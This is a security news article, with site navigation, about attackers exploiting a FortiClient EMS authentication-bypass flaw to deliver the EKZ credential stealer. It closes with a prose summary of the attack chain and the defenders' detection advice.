Hackers exploit FortiClient EMS flaw to push infostealer malware

Recorded: May 28, 2026, 6:03 p.m.

Original

News

Featured
Latest

Glassworm botnet disrupted after resilient C2 infrastructure takedown

CISA gives feds 4 days to patch actively exploited cPanel plugin flaw

Windows 11 KB5089573 update released with performance improvements

Charter confirms data breach after ShinyHunters extortion threat

Hackers exploit FortiClient EMS flaw to push infostealer malware

New Gogs zero-day flaw lets hackers get remote code execution

How SIEM helps MSPs reduce noise and stop threats faster

Romanian gets 5 years in prison for hacking Oregon govt network

Tutorials

Latest
Popular

How to access the Dark Web using the Tor Browser

How to enable Kernel-mode Hardware-enforced Stack Protection in Windows 11

How to use the Windows Registry Editor

How to backup and restore the Windows Registry

How to start Windows in Safe Mode

How to remove a Trojan, Virus, Worm, or other Malware

How to show hidden files in Windows 7

How to see hidden files in Windows

Webinars
Downloads

Latest
Most Downloaded

Qualys BrowserCheck

STOPDecrypter

AuroraDecrypter

FilesLockerDecrypter

AdwCleaner

ComboFix

RKill

Junkware Removal Tool

Deals

Categories

eLearning

IT Certification Courses

Gear + Gadgets

Security

VPNs

Popular

Best VPNs

How to change IP address

Access the dark web safely

Best VPN for YouTube

Forums
More

Virus Removal Guides
Startup Database
Uninstall Database
Glossary
Send us a Tip!
Welcome Guide

HomeNewsSecurityHackers exploit FortiClient EMS flaw to push infostealer malware

Hackers exploit FortiClient EMS flaw to push infostealer malware

By Bill Toulas

May 28, 2026
01:25 PM
0

Hackers are exploiting an authentication bypass vulnerability (CVE-2026-35616) in FortiClient Enterprise Management Server (EMS) to deliver an undocumented credential stealer called EKZ.
The attacker disguised the malware as an update for Fortinet endpoints and executed it through VPN scripting workflows managed by FortiClient.
The exploited critical vulnerability is an improper access control flaw that allows unauthenticated remote attackers to execute arbitrary code or commands via specially crafted requests.
Fortinet confirmed in early April that it was being exploited and released emergency hotfixes for versions 7.4.5 and 7.4.6 of the product.
CISA reacted quickly to the malicious activity and ordered federal agencies to secure their instances by the end of that week, while the internet security watchdog group The Shadowserver Foundation reported at the time that it was seeing 2,000 internet-exposed EMS instances.
Earlier this month, cybersecurity company Arctic Wolf observed attacks leveraging the vulnerability to deliver the EKZ infostealer. The researchers note that the intrusion begins with abusing endpoint APIs to perform administrative actions without authentication.
The attacker then modifies the EMS configuration and VPN policies to introduce the execution of malicious scripts. Seconds after endpoints established an IPsec tunnel to a FortiGate firewall, the legitimate fortitray.exe launched malicious batch scripts through Command Prompt.
Those scripts executed a base64-encoded PowerShell payload that downloaded and ran malware disguised as a Fortinet patch, then exfiltrated data to an attacker-controlled VPS over HTTP.

Malicious PowerShell codeSource: Arctic Wolf
“Rather than relying on a generic malware lure, the payload was presented as a Fortinet endpoint update and executed through FortiClient-managed VPN scripting workflows,” reads the report from Arctic Wolf.
“On affected endpoints, FortiClient components launched command scripts that invoked PowerShell, downloaded a credential stealer, executed it silently, and exfiltrated harvested browser data before removing local artifacts.”
The downloaded payload, tracked as EKZ Infostealer, features fairly standard information-stealing functionality. It targets both Chromium-based and Firefox web browsers and extracts stored data to text files while bypassing encrypted password protections.

Stealer executes without argumentsSource: Arctic Wolf
The malware targets credentials, credit card details, addresses, phone numbers, and cookies, which provide access to accounts protected by multi-factor authentication without loging it.
According to Arctic Wolf, one indication of an exploitation attempt in attacks delivering the EKZ infostealer is the presence in the logs of the line "Certificate not found in request header." In lab tests, the error was followed in seconds by another entry: Certificate user: fortinet-ca2 … successfully updated
As such, the researchers recommend defenders look for certificate-authentication anomalies and unexpected changes to Remote Access Profile configurations.
Any suspicious administrative activity, such as new accounts, logins with an unfamiliar origin (Tor, VPS IP addresses), or actions leading to configuration changes, should be considered red flags.
Arctic Wolf's report provides extensive detection guidance that could help organizations prevent the observed attacks.

The Validation Gap: Automated Pentesting Answers One Question. You Need Six.

Automated pentesting tools deliver real value, but they were built to answer one question: can an attacker move through the network? They were not built to test whether your controls block threats, your detection rules fire, or your cloud configs hold.This guide covers the 6 surfaces you actually need to validate.
Download Now

Related Articles:
Hackers bypass SonicWall VPN MFA due to incomplete patchingHackers exploit auth bypass flaw in Burst Statistics WordPress pluginCritical cPanel and WHM bug exploited as a zero-day, PoC now availableCritical Nginx UI auth bypass flaw now actively exploited in the wildCISA orders feds to patch exploited Fortinet EMS flaw by Friday

Actively Exploited
Authentication Bypass
EKZ Infostealer
Forticlient EMS
Info Stealer
Information Stealer
Vulnerability

Bill Toulas
Bill Toulas is a tech writer and infosec news reporter with over a decade of experience working on various online publications, covering open-source, Linux, malware, data breach incidents, and hacks.

Popular Stories

FBI warns of Kali365 phishing service targeting Microsoft 365 accounts

Charter confirms data breach after ShinyHunters extortion threat

Microsoft Defender can now automatically isolate hacked endpoints

Sponsor Posts

AI is a data-breach time bomb: Read the new report

Protect Your Business from Ecommerce Fraud

#1 MSP Benchmark report 2026: Insights from 1,000+ MSPs on growth, security, artificial intelligence, and key 2026 trends.

Overdue a password health-check? Audit your Active Directory for free

Upcoming Webinar

Main Sections

News
Webinars
VPN Buyer Guides
SysAdmin Software Guides
Downloads
Virus Removal Guides
Tutorials
Startup Database
Uninstall Database
Glossary

Community

Forums
Forum Rules
Chat

Useful Resources

Welcome Guide
Sitemap

Company

About BleepingComputer
Contact Us
Send us a Tip!
Advertising
Write for BleepingComputer
Social & Feeds
Changelog

Username

Password

Remember Me

Not a member yet? Register Now

Reporter

Help us understand the problem. What is going on with this comment?

Spam

Abusive or Harmful

Inappropriate content

Strong language

Other

Read our posting guidelinese to learn what content is prohibited.

Submitting...
SUBMIT

Hackers successfully exploited an authentication bypass vulnerability, specifically CVE-2026-35616, within the FortiClient Enterprise Management Server (EMS) to deploy an undocumented credential stealer known as EKZ. This vulnerability stemmed from an improper access control flaw that permitted unauthenticated remote attackers to execute arbitrary code or commands through specially crafted requests. Fortinet acknowledged this exploitation and released emergency hotfixes for versions 7.4.5 and 7.4.6 of the product. The malicious activity was observed by cybersecurity researchers, including Arctic Wolf, who noted that the intrusion began by abusing endpoint APIs to perform administrative actions without proper authentication.

The attackers leveraged this access to modify the EMS configuration and VPN policies to introduce the execution of malicious scripts. The exploitation pathway demonstrated a multi-stage attack: immediately following the establishment of an IPsec tunnel to a FortiGate firewall, legitimate components like fortitray.exe were used to launch malicious batch scripts via the Command Prompt. These scripts subsequently executed a base64-encoded PowerShell payload designed to download and run malware disguised as a Fortinet endpoint update. This process allowed the payload, tracked as the EKZ Infostealer, to exfiltrate data to an attacker-controlled Virtual Private Server over HTTP.

The payload was specifically designed not just as a generic malware lure but was presented as a Fortinet endpoint update executed through FortiClient-managed VPN scripting workflows. On affected endpoints, the FortiClient components initiated command scripts that invoked PowerShell, which in turn downloaded, executed silently, and exfiltrated harvested data before removing local artifacts. The EKZ Infostealer is capable of performing standard information-stealing functions, targeting data from both Chromium-based and Firefox web browsers, extracting stored data into text files while effectively bypassing encrypted password protections. This stealer targets sensitive information including credentials, credit card details, addresses, phone numbers, and cookies, allowing attackers access to accounts protected by multi-factor authentication without necessitating a login.

Researchers indicated that a specific indicator of this exploitation attempt involves anomalous certificate behavior, noting the sequence where an error message regarding a missing certificate was followed immediately by a successful certificate update within seconds, suggesting system manipulation. Therefore, defenders are advised to scrutinize certificate-authentication anomalies and any unexpected alterations to Remote Access Profile configurations. Furthermore, detecting suspicious administrative activity, such as the creation of new accounts or logins originating from unfamiliar sources like Tor or Virtual Private Server IP addresses, should be treated as critical red flags. Arctic Wolf provided extensive detection guidance derived from their findings to aid organizations in preventing similar attacks.